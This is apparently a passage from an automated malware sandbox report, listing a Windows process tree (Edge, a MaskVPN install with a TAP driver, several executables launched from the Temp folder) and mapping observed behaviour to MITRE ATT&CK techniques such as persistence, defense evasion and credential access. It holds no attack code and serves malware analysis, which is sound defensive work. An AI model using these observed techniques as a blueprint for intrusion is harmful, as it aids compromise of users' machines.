1⤵
PID:6248

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5072

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5472

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:5868

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\961de38a5126447a993ee6d0df7f64b3 /t 0 /p 5072
1⤵
PID:6776

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:7824

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2fef7b5d-496c-7241-abd5-916e4b8ef114}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:6572

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"
2⤵
PID:8384

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:8548

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6652

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5288

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5668

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9924

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\0489436869cd469b9d33e96bdb180a53 /t 10128 /p 9924
1⤵
PID:4880

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:9392

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:5548

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9116

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\e5fad30295c2461bbd2f1d260896269f /t 8676 /p 9116
1⤵
PID:9596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6392

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9188

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4452

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5544

C:\Users\Admin\AppData\Local\Temp\2729.tmp.exe
C:\Users\Admin\AppData\Local\Temp\2729.tmp.exe
1⤵
PID:10360

C:\Users\Admin\AppData\Local\Temp\4F44.tmp.exe
C:\Users\Admin\AppData\Local\Temp\4F44.tmp.exe
1⤵
PID:11292

C:\Users\Admin\AppData\Local\Temp\5995.tmp.exe
C:\Users\Admin\AppData\Local\Temp\5995.tmp.exe
1⤵
PID:11248

C:\Users\Admin\AppData\Local\Temp\7DD8.tmp.exe
C:\Users\Admin\AppData\Local\Temp\7DD8.tmp.exe
1⤵
PID:12820

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

New Service

T1050

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Security Software Discovery

T1063

Query Registry

System Information Discovery

Peripheral Device Discovery